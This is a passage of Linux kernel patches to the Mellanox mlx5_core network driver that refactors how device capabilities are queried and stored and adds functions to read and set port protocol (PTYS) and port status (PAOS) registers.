cur hca ODP caps failed, %d\n", err); - goto out; + if (MLX5_CAP_GEN(dev, eth_net_offloads)) { + err = mlx5_core_get_caps(dev, MLX5_CAP_ETHERNET_OFFLOADS, + HCA_CAP_OPMOD_GET_CUR); + if (err) + return err; + err = mlx5_core_get_caps(dev, MLX5_CAP_ETHERNET_OFFLOADS, + HCA_CAP_OPMOD_GET_MAX); + if (err) + return err; } - memcpy(caps, MLX5_ADDR_OF(query_hca_cap_out, out, capability), - sizeof(*caps)); + if (MLX5_CAP_GEN(dev, pg)) { + err = mlx5_core_get_caps(dev, MLX5_CAP_ODP, + HCA_CAP_OPMOD_GET_CUR); + if (err) + return err; + err = mlx5_core_get_caps(dev, MLX5_CAP_ODP, + HCA_CAP_OPMOD_GET_MAX); + if (err) + return err; + } - mlx5_core_dbg(dev, "on-demand paging capabilities:\nrc: %08x\nuc: %08x\nud: %08x\n", - be32_to_cpu(caps->per_transport_caps.rc_odp_caps), - be32_to_cpu(caps->per_transport_caps.uc_odp_caps), - be32_to_cpu(caps->per_transport_caps.ud_odp_caps)); + if (MLX5_CAP_GEN(dev, atomic)) { + err = mlx5_core_get_caps(dev, MLX5_CAP_ATOMIC, + HCA_CAP_OPMOD_GET_CUR); + if (err) + return err; + err = mlx5_core_get_caps(dev, MLX5_CAP_ATOMIC, + HCA_CAP_OPMOD_GET_MAX); + if (err) + return err; + } -out: - kfree(out); - return err; + if (MLX5_CAP_GEN(dev, roce)) { + err = mlx5_core_get_caps(dev, MLX5_CAP_ROCE, + HCA_CAP_OPMOD_GET_CUR); + if (err) + return err; + err = mlx5_core_get_caps(dev, MLX5_CAP_ROCE, + HCA_CAP_OPMOD_GET_MAX); + if (err) + return err; + } + + if (MLX5_CAP_GEN(dev, nic_flow_table)) { + err = mlx5_core_get_caps(dev, MLX5_CAP_FLOW_TABLE, + HCA_CAP_OPMOD_GET_CUR); + if (err) + return err; + err = mlx5_core_get_caps(dev, MLX5_CAP_FLOW_TABLE, + HCA_CAP_OPMOD_GET_MAX); + if (err) + return err; + } + return 0; } -EXPORT_SYMBOL(mlx5_query_odp_caps); int mlx5_cmd_init_hca(struct mlx5_core_dev *dev) { diff --git a/drivers/net/ethernet/mellanox/mlx5/core/main.c b/drivers/net/ethernet/mellanox/mlx5/core/main.c index a652cb93ceaa..e7b7b123a128 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/main.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/main.c @@ -211,11 +211,12 @@ static int mlx5_enable_msix(struct mlx5_core_dev *dev) { struct mlx5_priv *priv = &dev->priv; struct mlx5_eq_table *table = &priv->eq_table; - int num_eqs = 1 << dev->caps.gen.log_max_eq; + int num_eqs = 1 << MLX5_CAP_GEN(dev, log_max_eq); int nvec; int i; - nvec = dev->caps.gen.num_ports * num_online_cpus() + MLX5_EQ_VEC_COMP_BASE; + nvec = MLX5_CAP_GEN(dev, num_ports) * num_online_cpus() + + MLX5_EQ_VEC_COMP_BASE; nvec = min_t(int, nvec, num_eqs); if (nvec <= MLX5_EQ_VEC_COMP_BASE) return -ENOMEM; @@ -287,97 +288,28 @@ static u16 
to_fw_pkey_sz(u32 size) } } -/* selectively copy writable fields clearing any reserved area - */ -static void copy_rw_fields(void *to, struct mlx5_caps *from) -{ - __be64 *flags_off = (__be64 *)MLX5_ADDR_OF(cmd_hca_cap, to, reserved_22); - u64 v64; - - MLX5_SET(cmd_hca_cap, to, log_max_qp, from->gen.log_max_qp); - MLX5_SET(cmd_hca_cap, to, log_max_ra_req_qp, from->gen.log_max_ra_req_qp); - MLX5_SET(cmd_hca_cap, to, log_max_ra_res_qp, from->gen.log_max_ra_res_qp); - MLX5_SET(cmd_hca_cap, to, pkey_table_size, from->gen.pkey_table_size); - MLX5_SET(cmd_hca_cap, to, pkey_table_size, to_fw_pkey_sz(from->gen.pkey_table_size)); - MLX5_SET(cmd_hca_cap, to, log_uar_page_sz, PAGE_SHIFT - 12); - v64 = from->gen.flags & MLX5_CAP_BITS_RW_MASK; - *flags_off = cpu_to_be64(v64); -} - -static u16 get_pkey_table_size(int pkey) +static u16 to_sw_pkey_sz(int pkey_sz) { - if (pkey > MLX5_MAX_LOG_PKEY_TABLE) + if (pkey_sz > MLX5_MAX_LOG_PKEY_TABLE) return 0; - return MLX5_MIN_PKEY_TABLE_SIZE << pkey; -} - -static void fw2drv_caps(struct mlx5_caps *caps, void *out) -{ - struct mlx5_general_caps *gen = &caps->gen; - - gen->max_srq_wqes = 1 << MLX5_GET_PR(cmd_hca_cap, out, log_max_srq_sz); - gen->max_wqes = 1 << MLX5_GET_PR(cmd_hca_cap, out, log_max_qp_sz); - gen->log_max_qp = MLX5_GET_PR(cmd_hca_cap, out, log_max_qp); - gen->log_max_srq = MLX5_GET_PR(cmd_hca_cap, out, log_max_srq); - gen->max_cqes = 1 << MLX5_GET_PR(cmd_hca_cap, out, log_max_cq_sz); - gen->log_max_cq = MLX5_GET_PR(cmd_hca_cap, out, log_max_cq); - gen->max_eqes = 1 << MLX5_GET_PR(cmd_hca_cap, out, log_max_eq_sz); - gen->log_max_mkey = MLX5_GET_PR(cmd_hca_cap, out, log_max_mkey); - gen->log_max_eq = MLX5_GET_PR(cmd_hca_cap, out, log_max_eq); - gen->max_indirection = MLX5_GET_PR(cmd_hca_cap, out, max_indirection); - gen->log_max_mrw_sz = MLX5_GET_PR(cmd_hca_cap, out, log_max_mrw_sz); - gen->log_max_bsf_list_size = MLX5_GET_PR(cmd_hca_cap, out, log_max_bsf_list_size); - gen->log_max_klm_list_size = MLX5_GET_PR(cmd_hca_cap, out, log_max_klm_list_size); - gen->log_max_ra_req_dc = MLX5_GET_PR(cmd_hca_cap, out, log_max_ra_req_dc); - gen->log_max_ra_res_dc = MLX5_GET_PR(cmd_hca_cap, out, log_max_ra_res_dc); - gen->log_max_ra_req_qp = MLX5_GET_PR(cmd_hca_cap, out, log_max_ra_req_qp); - gen->log_max_ra_res_qp = MLX5_GET_PR(cmd_hca_cap, out, log_max_ra_res_qp); - gen->max_qp_counters = MLX5_GET_PR(cmd_hca_cap, out, max_qp_cnt); - gen->pkey_table_size = get_pkey_table_size(MLX5_GET_PR(cmd_hca_cap, out, pkey_table_size)); - gen->local_ca_ack_delay = MLX5_GET_PR(cmd_hca_cap, out, local_ca_ack_delay); - gen->num_ports = MLX5_GET_PR(cmd_hca_cap, out, num_ports); - gen->log_max_msg = MLX5_GET_PR(cmd_hca_cap, out, log_max_msg); - gen->stat_rate_support = MLX5_GET_PR(cmd_hca_cap, out, stat_rate_support); - gen->flags = be64_to_cpu(*(__be64 *)MLX5_ADDR_OF(cmd_hca_cap, out, reserved_22)); - pr_debug("flags = 0x%llx\n", gen->flags); - gen->uar_sz = MLX5_GET_PR(cmd_hca_cap, out, uar_sz); - gen->min_log_pg_sz = MLX5_GET_PR(cmd_hca_cap, out, log_pg_sz); - gen->bf_reg_size = MLX5_GET_PR(cmd_hca_cap, out, bf); - gen->bf_reg_size = 1 << MLX5_GET_PR(cmd_hca_cap, out, log_bf_reg_size); - gen->max_sq_desc_sz = MLX5_GET_PR(cmd_hca_cap, out, max_wqe_sz_sq); - gen->max_rq_desc_sz = MLX5_GET_PR(cmd_hca_cap, out, max_wqe_sz_rq); - gen->max_dc_sq_desc_sz = MLX5_GET_PR(cmd_hca_cap, out, max_wqe_sz_sq_dc); - gen->max_qp_mcg = MLX5_GET_PR(cmd_hca_cap, out, max_qp_mcg); - gen->log_max_pd = MLX5_GET_PR(cmd_hca_cap, out, log_max_pd); - gen->log_max_xrcd = MLX5_GET_PR(cmd_hca_cap, out, 
log_max_xrcd); - gen->log_uar_page_sz = MLX5_GET_PR(cmd_hca_cap, out, log_uar_page_sz); -} - -static const char *caps_opmod_str(u16 opmod) -{ - switch (opmod) { - case HCA_CAP_OPMOD_GET_MAX: - return "GET_MAX"; - case HCA_CAP_OPMOD_GET_CUR: - return "GET_CUR"; - default: - return "Invalid"; - } + return MLX5_MIN_PKEY_TABLE_SIZE << pkey_sz; } -int mlx5_core_get_caps(struct mlx5_core_dev *dev, struct mlx5_caps *caps, - u16 opmod) +int mlx5_core_get_caps(struct mlx5_core_dev *dev, enum mlx5_cap_type cap_type, + enum mlx5_cap_mode cap_mode) { u8 in[MLX5_ST_SZ_BYTES(query_hca_cap_in)]; int out_sz = MLX5_ST_SZ_BYTES(query_hca_cap_out); - void *out; + void *out, *hca_caps; + u16 opmod = (cap_type << 1) | (cap_mode & 0x01); int err; memset(in, 0, sizeof(in)); out = kzalloc(out_sz, GFP_KERNEL); if (!out) return -ENOMEM; + MLX5_SET(query_hca_cap_in, in, opcode, MLX5_CMD_OP_QUERY_HCA_CAP); MLX5_SET(query_hca_cap_in, in, op_mod, opmod); err = mlx5_cmd_exec(dev, in, sizeof(in), out, out_sz); @@ -386,12 +318,30 @@ int mlx5_core_get_caps(struct mlx5_core_dev *dev, struct mlx5_caps *caps, err = mlx5_cmd_status_to_err_v2(out); if (err) { - mlx5_core_warn(dev, "query max hca cap failed, %d\n", err); + mlx5_core_warn(dev, + "QUERY_HCA_CAP : type(%x) opmode(%x) Failed(%d)\n", + cap_type, cap_mode, err); goto query_ex; } - mlx5_core_dbg(dev, "%s\n", caps_opmod_str(opmod)); - fw2drv_caps(caps, MLX5_ADDR_OF(query_hca_cap_out, out, capability)); + hca_caps = MLX5_ADDR_OF(query_hca_cap_out, out, capability); + + switch (cap_mode) { + case HCA_CAP_OPMOD_GET_MAX: + memcpy(dev->hca_caps_max[cap_type], hca_caps, + MLX5_UN_SZ_BYTES(hca_cap_union)); + break; + case HCA_CAP_OPMOD_GET_CUR: + memcpy(dev->hca_caps_cur[cap_type], hca_caps, + MLX5_UN_SZ_BYTES(hca_cap_union)); + break; + default: + mlx5_core_warn(dev, + "Tried to query dev cap type(%x) with wrong opmode(%x)\n", + cap_type, cap_mode); + err = -EINVAL; + break; + } query_ex: kfree(out); return err; @@ -418,49 +368,45 @@ static int handle_hca_cap(struct mlx5_core_dev *dev) { void *set_ctx = NULL; struct mlx5_profile *prof = dev->profile; - struct mlx5_caps *cur_caps = NULL; - struct mlx5_caps *max_caps = NULL; int err = -ENOMEM; int set_sz = MLX5_ST_SZ_BYTES(set_hca_cap_in); + void *set_hca_cap; set_ctx = kzalloc(set_sz, GFP_KERNEL); if (!set_ctx) goto query_ex; - max_caps = kzalloc(sizeof(*max_caps), GFP_KERNEL); - if (!max_caps) - goto query_ex; - - cur_caps = kzalloc(sizeof(*cur_caps), GFP_KERNEL); - if (!cur_caps) - goto query_ex; - - err = mlx5_core_get_caps(dev, max_caps, HCA_CAP_OPMOD_GET_MAX); + err = mlx5_core_get_caps(dev, MLX5_CAP_GENERAL, HCA_CAP_OPMOD_GET_MAX); if (err) goto query_ex; - err = mlx5_core_get_caps(dev, cur_caps, HCA_CAP_OPMOD_GET_CUR); + err = mlx5_core_get_caps(dev, MLX5_CAP_GENERAL, HCA_CAP_OPMOD_GET_CUR); if (err) goto query_ex; + set_hca_cap = MLX5_ADDR_OF(set_hca_cap_in, set_ctx, + capability); + memcpy(set_hca_cap, dev->hca_caps_cur[MLX5_CAP_GENERAL], + MLX5_ST_SZ_BYTES(cmd_hca_cap)); + + mlx5_core_dbg(dev, "Current Pkey table size %d Setting new size %d\n", + to_sw_pkey_sz(MLX5_CAP_GEN(dev, pkey_table_size)), + 128); /* we limit the size of the pkey table to 128 entries for now */ - cur_caps->gen.pkey_table_size = 128; + MLX5_SET(cmd_hca_cap, set_hca_cap, pkey_table_size, + to_fw_pkey_sz(128)); if (prof->mask & MLX5_PROF_MASK_QP_SIZE) - cur_caps->gen.log_max_qp = prof->log_max_qp; + MLX5_SET(cmd_hca_cap, set_hca_cap, log_max_qp, + prof->log_max_qp); - /* disable checksum */ - cur_caps->gen.flags &= ~MLX5_DEV_CAP_FLAG_CMDIF_CSUM; 
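/*
 * In the reworked handle_hca_cap() the CURRENT general caps are copied
 * verbatim into the SET_HCA_CAP mailbox and only the writable fields are
 * then patched in place with MLX5_SET(): pkey_table_size (capped at 128
 * entries), log_max_qp from the device profile, and the cmdif_checksum
 * bit below. This replaces the old round trip through
 * struct mlx5_general_caps and copy_rw_fields().
 */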
+ /* disable cmdif checksum */ + MLX5_SET(cmd_hca_cap, set_hca_cap, cmdif_checksum, 0); - copy_rw_fields(MLX5_ADDR_OF(set_hca_cap_in, set_ctx, capability), - cur_caps); err = set_caps(dev, set_ctx, set_sz); query_ex: - kfree(cur_caps); - kfree(max_caps); kfree(set_ctx); - return err; } @@ -768,7 +714,7 @@ static int mlx5_dev_init(struct mlx5_core_dev *dev, struct pci_dev *pdev) mlx5_start_health_poll(dev); - err = mlx5_cmd_query_hca_cap(dev, &dev->caps); + err = mlx5_query_hca_caps(dev); if (err) { dev_err(&pdev->dev, "query hca failed\n"); goto err_stop_poll; diff --git a/drivers/net/ethernet/mellanox/mlx5/core/mlx5_core.h b/drivers/net/ethernet/mellanox/mlx5/core/mlx5_core.h index a051b906afdf..b986f1c258bc 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/mlx5_core.h +++ b/drivers/net/ethernet/mellanox/mlx5/core/mlx5_core.h @@ -65,9 +65,15 @@ enum { MLX5_CMD_TIME, /* print command execution time */ }; +static inline int mlx5_cmd_exec_check_status(struct mlx5_core_dev *dev, u32 *in, + int in_size, u32 *out, + int out_size) +{ + mlx5_cmd_exec(dev, in, in_size, out, out_size); + return mlx5_cmd_status_to_err((struct mlx5_outbox_hdr *)out); +} -int mlx5_cmd_query_hca_cap(struct mlx5_core_dev *dev, - struct mlx5_caps *caps); +int mlx5_query_hca_caps(struct mlx5_core_dev *dev); int mlx5_cmd_query_adapter(struct mlx5_core_dev *dev); int mlx5_cmd_init_hca(struct mlx5_core_dev *dev); int mlx5_cmd_teardown_hca(struct mlx5_core_dev *dev); diff --git a/drivers/net/ethernet/mellanox/mlx5/core/uar.c b/drivers/net/ethernet/mellanox/mlx5/core/uar.c index ba58f6d7c761..9ef85873ceea 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/uar.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/uar.c @@ -175,12 +175,13 @@ int mlx5_alloc_uuars(struct mlx5_core_dev *dev, struct mlx5_uuar_info *uuari) for (i = 0; i < tot_uuars; i++) { bf = &uuari->bfs[i]; - bf->buf_size = dev->caps.gen.bf_reg_size / 2; + bf->buf_size = (1 << MLX5_CAP_GEN(dev, log_bf_reg_size)) / 2; bf->uar = &uuari->uars[i / MLX5_BF_REGS_PER_PAGE]; bf->regreg = uuari->uars[i / MLX5_BF_REGS_PER_PAGE].map; bf->reg = NULL; /* Add WC support */ - bf->offset = (i % MLX5_BF_REGS_PER_PAGE) * dev->caps.gen.bf_reg_size + - MLX5_BF_OFFSET; + bf->offset = (i % MLX5_BF_REGS_PER_PAGE) * + (1 << MLX5_CAP_GEN(dev, log_bf_reg_size)) + + MLX5_BF_OFFSET; bf->need_lock = need_uuar_lock(i); spin_lock_init(&bf->lock); spin_lock_init(&bf->lock32); diff --git a/include/linux/mlx5/device.h b/include/linux/mlx5/device.h index feebed7b392b..4ee52bf1f959 100644 --- a/include/linux/mlx5/device.h +++ b/include/linux/mlx5/device.h @@ -59,6 +59,8 @@ #define MLX5_FLD_SZ_BYTES(typ, fld) (__mlx5_bit_sz(typ, fld) / 8) #define MLX5_ST_SZ_BYTES(typ) (sizeof(struct mlx5_ifc_##typ##_bits) / 8) #define MLX5_ST_SZ_DW(typ) (sizeof(struct mlx5_ifc_##typ##_bits) / 32) +#define MLX5_UN_SZ_BYTES(typ) (sizeof(union mlx5_ifc_##typ##_bits) / 8) +#define MLX5_UN_SZ_DW(typ) (sizeof(union mlx5_ifc_##typ##_bits) / 32) #define MLX5_BYTE_OFF(typ, fld) (__mlx5_bit_off(typ, fld) / 8) #define MLX5_ADDR_OF(typ, p, fld) ((char *)(p) + MLX5_BYTE_OFF(typ, fld)) @@ -322,13 +324,6 @@ enum { MLX5_CAP_OFF_CMDIF_CSUM = 46, }; -enum { - HCA_CAP_OPMOD_GET_MAX = 0, - HCA_CAP_OPMOD_GET_CUR = 1, - HCA_CAP_OPMOD_GET_ODP_MAX = 4, - HCA_CAP_OPMOD_GET_ODP_CUR = 5 -}; - struct mlx5_inbox_hdr { __be16 opcode; u8 rsvd[4]; @@ -1101,4 +1096,61 @@ enum { MLX5_RQC_RQ_TYPE_MEMORY_RQ_RPM = 0x1, }; +/* MLX5 DEV CAPs */ + +/* TODO: EAT.ME */ +enum mlx5_cap_mode { + HCA_CAP_OPMOD_GET_MAX = 0, + HCA_CAP_OPMOD_GET_CUR = 1, +}; + +enum 
mlx5_cap_type { + MLX5_CAP_GENERAL = 0, + MLX5_CAP_ETHERNET_OFFLOADS, + MLX5_CAP_ODP, + MLX5_CAP_ATOMIC, + MLX5_CAP_ROCE, + MLX5_CAP_IPOIB_OFFLOADS, + MLX5_CAP_EOIB_OFFLOADS, + MLX5_CAP_FLOW_TABLE, + /* NUM OF CAP Types */ + MLX5_CAP_NUM +}; + +/* GET Dev Caps macros */ +#define MLX5_CAP_GEN(mdev, cap) \ + MLX5_GET(cmd_hca_cap, mdev->hca_caps_cur[MLX5_CAP_GENERAL], cap) + +#define MLX5_CAP_GEN_MAX(mdev, cap) \ + MLX5_GET(cmd_hca_cap, mdev->hca_caps_max[MLX5_CAP_GENERAL], cap) + +#define MLX5_CAP_ETH(mdev, cap) \ + MLX5_GET(per_protocol_networking_offload_caps,\ + mdev->hca_caps_cur[MLX5_CAP_ETHERNET_OFFLOADS], cap) + +#define MLX5_CAP_ETH_MAX(mdev, cap) \ + MLX5_GET(per_protocol_networking_offload_caps,\ + mdev->hca_caps_max[MLX5_CAP_ETHERNET_OFFLOADS], cap) + +#define MLX5_CAP_ROCE(mdev, cap) \ + MLX5_GET(roce_cap, mdev->hca_caps_cur[MLX5_CAP_ROCE], cap) + +#define MLX5_CAP_ROCE_MAX(mdev, cap) \ + MLX5_GET(roce_cap, mdev->hca_caps_max[MLX5_CAP_ROCE], cap) + +#define MLX5_CAP_ATOMIC(mdev, cap) \ + MLX5_GET(atomic_caps, mdev->hca_caps_cur[MLX5_CAP_ATOMIC], cap) + +#define MLX5_CAP_ATOMIC_MAX(mdev, cap) \ + MLX5_GET(atomic_caps, mdev->hca_caps_max[MLX5_CAP_ATOMIC], cap) + +#define MLX5_CAP_FLOWTABLE(mdev, cap) \ + MLX5_GET(flow_table_nic_cap, mdev->hca_caps_cur[MLX5_CAP_FLOW_TABLE], cap) + +#define MLX5_CAP_FLOWTABLE_MAX(mdev, cap) \ + MLX5_GET(flow_table_nic_cap, mdev->hca_caps_max[MLX5_CAP_FLOW_TABLE], cap) + +#define MLX5_CAP_ODP(mdev, cap)\ + MLX5_GET(odp_cap, mdev->hca_caps_cur[MLX5_CAP_ODP], cap) + #endif /* MLX5_DEVICE_H */ diff --git a/include/linux/mlx5/driver.h b/include/linux/mlx5/driver.h index 3fd4fdc1ba16..6b9199163633 100644 --- a/include/linux/mlx5/driver.h +++ b/include/linux/mlx5/driver.h @@ -268,55 +268,7 @@ struct mlx5_cmd { struct mlx5_port_caps { int gid_table_len; int pkey_table_len; -}; - -struct mlx5_general_caps { - u8 log_max_eq; - u8 log_max_cq; - u8 log_max_qp; - u8 log_max_mkey; - u8 log_max_pd; - u8 log_max_srq; - u8 log_max_mrw_sz; - u8 log_max_bsf_list_size; - u8 log_max_klm_list_size; - u32 max_cqes; - int max_wqes; - u32 max_eqes; - u32 max_indirection; - int max_sq_desc_sz; - int max_rq_desc_sz; - int max_dc_sq_desc_sz; - u64 flags; - u16 stat_rate_support; - int log_max_msg; - int num_ports; - u8 log_max_ra_res_qp; - u8 log_max_ra_req_qp; - int max_srq_wqes; - int bf_reg_size; - int bf_regs_per_page; - struct mlx5_port_caps port[MLX5_MAX_PORTS]; - u8 ext_port_cap[MLX5_MAX_PORTS]; - int max_vf; - u32 reserved_lkey; - u8 local_ca_ack_delay; - u8 log_max_mcg; - u32 max_qp_mcg; - int min_page_sz; - int pd_cap; - u32 max_qp_counters; - u32 pkey_table_size; - u8 log_max_ra_req_dc; - u8 log_max_ra_res_dc; - u32 uar_sz; - u8 min_log_pg_sz; - u8 log_max_xrcd; - u16 log_uar_page_sz; -}; - -struct mlx5_caps { - struct mlx5_general_caps gen; + u8 ext_port_cap; }; struct mlx5_cmd_mailbox { @@ -521,7 +473,9 @@ struct mlx5_core_dev { u8 rev_id; char board_id[MLX5_BOARD_ID_LEN]; struct mlx5_cmd cmd; - struct mlx5_caps caps; + struct mlx5_port_caps port_caps[MLX5_MAX_PORTS]; + u32 hca_caps_cur[MLX5_CAP_NUM][MLX5_UN_SZ_DW(hca_cap_union)]; + u32 hca_caps_max[MLX5_CAP_NUM][MLX5_UN_SZ_DW(hca_cap_union)]; phys_addr_t iseg_base; struct mlx5_init_seg __iomem *iseg; void (*event) (struct mlx5_core_dev *dev, @@ -651,8 +605,8 @@ void mlx5_cmd_use_events(struct mlx5_core_dev *dev); void mlx5_cmd_use_polling(struct mlx5_core_dev *dev); int mlx5_cmd_status_to_err(struct mlx5_outbox_hdr *hdr); int mlx5_cmd_status_to_err_v2(void *ptr); -int mlx5_core_get_caps(struct mlx5_core_dev *dev, 
struct mlx5_caps *caps, - u16 opmod); +int mlx5_core_get_caps(struct mlx5_core_dev *dev, enum mlx5_cap_type cap_type, + enum mlx5_cap_mode cap_mode); int mlx5_cmd_exec(struct mlx5_core_dev *dev, void *in, int in_size, void *out, int out_size); int mlx5_cmd_exec_cb(struct mlx5_core_dev *dev, void *in, int in_size, From adb0c9545bce6f1b1d563e988e6ee5531861d449 Mon Sep 17 00:00:00 2001 From: Saeed Mahameed Date: Thu, 28 May 2015 22:28:42 +0300 Subject: [PATCH 496/872] net/mlx5_core: Implement access functions of ptys register fields Those registers will be used by the ethtool to set/get settings. Signed-off-by: Rana Shahout Signed-off-by: Saeed Mahameed Signed-off-by: Amir Vadai Signed-off-by: David S. Miller --- .../net/ethernet/mellanox/mlx5/core/port.c | 77 +++++++++++++++++++ include/linux/mlx5/driver.h | 14 ++++ 2 files changed, 91 insertions(+) diff --git a/drivers/net/ethernet/mellanox/mlx5/core/port.c b/drivers/net/ethernet/mellanox/mlx5/core/port.c index 49e90f2612d8..6e2d99cc3b61 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/port.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/port.c @@ -102,3 +102,80 @@ int mlx5_set_port_caps(struct mlx5_core_dev *dev, u8 port_num, u32 caps) return err; } EXPORT_SYMBOL_GPL(mlx5_set_port_caps); + +int mlx5_query_port_ptys(struct mlx5_core_dev *dev, u32 *ptys, + int ptys_size, int proto_mask) +{ + u32 in[MLX5_ST_SZ_DW(ptys_reg)]; + int err; + + memset(in, 0, sizeof(in)); + MLX5_SET(ptys_reg, in, local_port, 1); + MLX5_SET(ptys_reg, in, proto_mask, proto_mask); + + err = mlx5_core_access_reg(dev, in, sizeof(in), ptys, + ptys_size, MLX5_REG_PTYS, 0, 0); + + return err; +} +EXPORT_SYMBOL_GPL(mlx5_query_port_ptys); + +int mlx5_query_port_proto_cap(struct mlx5_core_dev *dev, + u32 *proto_cap, int proto_mask) +{ + u32 out[MLX5_ST_SZ_DW(ptys_reg)]; + int err; + + err = mlx5_query_port_ptys(dev, out, sizeof(out), proto_mask); + if (err) + return err; + + if (proto_mask == MLX5_PTYS_EN) + *proto_cap = MLX5_GET(ptys_reg, out, eth_proto_capability); + else + *proto_cap = MLX5_GET(ptys_reg, out, ib_proto_capability); + + return 0; +} +EXPORT_SYMBOL_GPL(mlx5_query_port_proto_cap); + +int mlx5_query_port_proto_admin(struct mlx5_core_dev *dev, + u32 *proto_admin, int proto_mask) +{ + u32 out[MLX5_ST_SZ_DW(ptys_reg)]; + int err; + + err = mlx5_query_port_ptys(dev, out, sizeof(out), proto_mask); + if (err) + return err; + + if (proto_mask == MLX5_PTYS_EN) + *proto_admin = MLX5_GET(ptys_reg, out, eth_proto_admin); + else + *proto_admin = MLX5_GET(ptys_reg, out, ib_proto_admin); + + return 0; +} +EXPORT_SYMBOL_GPL(mlx5_query_port_proto_admin); + +int mlx5_set_port_proto(struct mlx5_core_dev *dev, u32 proto_admin, + int proto_mask) +{ + u32 in[MLX5_ST_SZ_DW(ptys_reg)]; + u32 out[MLX5_ST_SZ_DW(ptys_reg)]; + int err; + + memset(in, 0, sizeof(in)); + + MLX5_SET(ptys_reg, in, local_port, 1); + MLX5_SET(ptys_reg, in, proto_mask, proto_mask); + if (proto_mask == MLX5_PTYS_EN) + MLX5_SET(ptys_reg, in, eth_proto_admin, proto_admin); + else + MLX5_SET(ptys_reg, in, ib_proto_admin, proto_admin); + + err = mlx5_core_access_reg(dev, in, sizeof(in), out, + sizeof(out), MLX5_REG_PTYS, 0, 1); + return err; +} +EXPORT_SYMBOL_GPL(mlx5_set_port_proto); diff --git a/include/linux/mlx5/driver.h b/include/linux/mlx5/driver.h index 6b9199163633..266d5498a270 100644 --- a/include/linux/mlx5/driver.h +++ b/include/linux/mlx5/driver.h @@ -504,6 +504,11 @@ enum { MLX5_COMP_EQ_SIZE = 1024, }; +enum { + MLX5_PTYS_IB = 1 << 0, + MLX5_PTYS_EN = 1 << 2, +}; + struct mlx5_db_pgdir { struct 
list_head list; DECLARE_BITMAP(bitmap, MLX5_DB_PER_PAGE); @@ -686,7 +691,16 @@ void mlx5_qp_debugfs_cleanup(struct mlx5_core_dev *dev); int mlx5_core_access_reg(struct mlx5_core_dev *dev, void *data_in, int size_in, void *data_out, int size_out, u16 reg_num, int arg, int write); + int mlx5_set_port_caps(struct mlx5_core_dev *dev, u8 port_num, u32 caps); +int mlx5_query_port_ptys(struct mlx5_core_dev *dev, u32 *ptys, + int ptys_size, int proto_mask); +int mlx5_query_port_proto_cap(struct mlx5_core_dev *dev, + u32 *proto_cap, int proto_mask); +int mlx5_query_port_proto_admin(struct mlx5_core_dev *dev, + u32 *proto_admin, int proto_mask); +int mlx5_set_port_proto(struct mlx5_core_dev *dev, u32 proto_admin, + int proto_mask); int mlx5_debug_eq_add(struct mlx5_core_dev *dev, struct mlx5_eq *eq); void mlx5_debug_eq_remove(struct mlx5_core_dev *dev, struct mlx5_eq *eq); From 4c916a798058c1acf5a980438416020932c24aca Mon Sep 17 00:00:00 2001 From: Rana Shahout Date: Thu, 28 May 2015 22:28:43 +0300 Subject: [PATCH 497/872] net/mlx5_core: Implement get/set port status Implement get/set port status low-level functions to be exposed by the netdev. Signed-off-by: Rana Shahout Signed-off-by: Saeed Mahameed Signed-off-by: Amir Vadai Signed-off-by: David S. Miller --- .../net/ethernet/mellanox/mlx5/core/port.c | 32 +++++++++++++++++++ include/linux/mlx5/driver.h | 8 +++++ 2 files changed, 40 insertions(+) diff --git a/drivers/net/ethernet/mellanox/mlx5/core/port.c b/drivers/net/ethernet/mellanox/mlx5/core/port.c index 6e2d99cc3b61..742a6fb8debe 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/port.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/port.c @@ -179,3 +179,35 @@ int mlx5_set_port_proto(struct mlx5_core_dev *dev, u32 proto_admin, return err; } EXPORT_SYMBOL_GPL(mlx5_set_port_proto); + +int mlx5_set_port_status(struct mlx5_core_dev *dev, + enum mlx5_port_status status) +{ + u32 in[MLX5_ST_SZ_DW(paos_reg)]; + u32 out[MLX5_ST_SZ_DW(paos_reg)]; + + memset(in, 0, sizeof(in)); + + MLX5_SET(paos_reg, in, admin_status, status); + MLX5_SET(paos_reg, in, ase, 1); + + return mlx5_core_access_reg(dev, in, sizeof(in), out, + sizeof(out), MLX5_REG_PAOS, 0, 1); +} + +int mlx5_query_port_status(struct mlx5_core_dev *dev, u8 *status) +{ + u32 in[MLX5_ST_SZ_DW(paos_reg)]; + u32 out[MLX5_ST_SZ_DW(paos_reg)]; + int err; + + memset(in, 0, sizeof(in)); + + err = mlx5_core_access_reg(dev, in, sizeof(in), out, + sizeof(out), MLX5_REG_PAOS, 0, 0); + if (err) + return err; + + *status = MLX5_GET(paos_reg, out, oper_status); + return err; +} diff --git a/include/linux/mlx5/driver.h b/include/linux/mlx5/driver.h index 266d5498a270..6438444ab361 100644 --- a/include/linux/mlx5/driver.h +++ b/include/linux/mlx5/driver.h @@ -149,6 +149,11 @@ enum mlx5_dev_event { MLX5_DEV_EVENT_CLIENT_REREG, }; +enum mlx5_port_status { + MLX5_PORT_UP = 1 << 1, + MLX5_PORT_DOWN = 1 << 2, +}; + struct mlx5_uuar_info { struct mlx5_uar *uars; int num_uars; @@ -701,6 +706,9 @@ int mlx5_query_port_proto_admin(struct mlx5_core_dev *dev, u32 *proto_admin, int proto_mask); int mlx5_set_port_proto(struct mlx5_core_dev *dev, u32 proto_admin, int proto_mask); +int mlx5_set_port_status(struct mlx5_core_dev *dev, + enum mlx5_port_status status); +int mlx5_query_port_status(struct mlx5_core_dev *dev, u8 *status); int mlx5_debug_eq_add(struct mlx5_core_dev *dev, struct mlx5_eq *eq); void mlx5_debug_eq_remove(struct mlx5_core_dev *dev, struct mlx5_eq *eq); From 90b3e38d048f09b22fb50bcd460cea65fd00b2d7 Mon Sep 17 00:00:00 2001 From: Rana Shahout Date: Thu, 28
